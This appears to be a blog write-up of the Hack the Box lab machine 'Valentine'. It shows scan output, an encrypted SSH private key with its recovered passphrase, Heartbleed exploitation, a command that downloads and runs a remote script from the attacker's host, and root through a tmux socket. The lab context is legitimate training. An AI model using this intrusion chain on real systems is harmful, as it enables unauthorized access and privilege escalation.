Write-Up: HTB Valentine

Valentine is an easy Linux box on Hack the Box. Let’s jump right in!

First off, run my Mercon script (combines nmap and smbmap/gobuster depending on what the nmap scan finds).

Looking at the output, it looks like we have a basic webserver with an ssh port open.

kali@kali:~/development/Mercon$ ./mercon.py -t Valentine -i 10.10.10.79 -w /usr/share/wordlists/dirb/common.txt 
===== Running Nmap Scan =====
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 17:35 EST
Nmap scan report for 10.10.10.79
Host is up (0.025s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2020-11-14T22:37:04+00:00; +1m18s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 1m17s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.92 seconds

[+] Gobuster Running
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.79/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/11/14 17:35:47 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/cgi-bin/ (Status: 403)
/decode (Status: 200)
/dev (Status: 301)
/encode (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/11/14 17:36:10 Finished
===============================================================

Time to checkout the homepage before enumerating the directories we found with GoBuster. Nothing too interesting here, but it’s worth noting that the heart logo matches the heartbleed vulnerability logo. Made a note of that and then began jumping into the various directories.

Checking out /dev, it there a few files available. First, let’s look at notes.txt to see if there’s any helpful info that’s been left behind.

The more interesting file is “hype_key” that is full of hex. Time to decode it and see what the developers left us.

Well, this is very nice of them to leave behind. It’s a SSH private key! Unfortunately, it’s password encrypted and attempting to brute force it didn’t work… Well, time to keep enumerating. Let’s jump back over to nmap and see if this server is actually vulnerability to the heartbleed attack.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

Lucky for us, it looks like the service is vulnerable :)

kali@kali:~/htb/valentine$ nmap -p 443 --script ssl-heartbleed 10.10.10.79
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 18:00 EST
Nmap scan report for 10.10.10.79
Host is up (0.024s latency).

PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://www.openssl.org/news/secadv_20140407.txt
|_ http://cvedetails.com/cve/2014-0160/

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds

Now it’s time to exploit. Copy the script from exploit db and give it a go (I filtered out lines with empty bytes to reduce noise). The results show some $text variable that looks like it is base-64 encoded.

I edited the script with the following to run the exploit 5 times, just to see if we get anything else from the server. Unfortunately, we didn’t find anything else.

if __name__ == '__main__':
for x in range(5):
main()

Decoding the text variable gets us the following string.

kali@kali:~/htb/valentine$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d
heartbleedbelievethehype

Let’s try this as the ssh key password and see where it gets us. And… it definitely gets us somewhere, a shell on the box!

kali@kali:~/htb/valentine$ ssh -i hype_key hype@10.10.10.79
load pubkey "hype_key": invalid format
Enter passphrase for key 'hype_key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

* Documentation: https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$

Send over linpeas to see if we can find anything blatantly wrong that will allow us to escalate our privileges.

hype@Valentine:~/Desktop$ bash <(curl -s http://10.10.14.22:8000/linPEAS/linpeas.sh)

Linpeas highlights a tmux process running as root. Looking it up on google, looks like this is trivial to exploit and get root.

================================( Processes, Cron, Services, Timers & Sockets )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
102 550 0.0 0.1 24076 1252 ? Ss 14:35 0:00 dbus-daemon[0m --system --fork --activation=upstart
avahi 617 0.0 0.0 32172 468 ? S 14:35 0:00 avahi-daemon[0m: chroot helper
daemon[0m 1038 0.0 0.0 16900 376 ? Ss 14:36 0:00 atd
hype 2602 0.0 0.1 92220 1672 ? S 15:13 0:00 sshd: hype@pts/0
hype 2603 0.0 0.8 31648 8768 pts/0 Ss 15:13 0:00 -bash
hype 2804 0.1 0.1 4776 1112 pts/0 S+ 15:19 0:00 /bin/sh ./linpeas.sh
hype 3355 0.0 0.1 22352 1276 pts/0 R+ 15:19 0:00 ps aux
hype 3357 0.0 0.0 19864 808 pts/0 S+ 15:19 0:00 sort
root 1 0.0 0.2 24428 2420 ? Ss 14:35 0:00 /sbin/init
root 1006 0.0 0.0 19976 976 tty2 Ss+ 14:36 0:00 /sbin/getty -8 38400 tty2
root 1007 0.0 0.0 19976 976 tty3 Ss+ 14:36 0:00 /sbin/getty -8 38400 tty3
root 1010 0.0 0.1 26416 1672 ? Ss 14:36 0:00 /usr/bin/tmux -S /.devs/dev_sess

Run tmux with the /.devs/dev_sess path for -S (socket-path) and we have root!

hype@Valentine:~/Desktop$ tmux -S /.devs/dev_sess


root@Valentine:/home/hype/Desktop# id
uid=0(root) gid=0(root) groups=0(root)

Overall, this was a fun box to go through. Thanks for reading!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store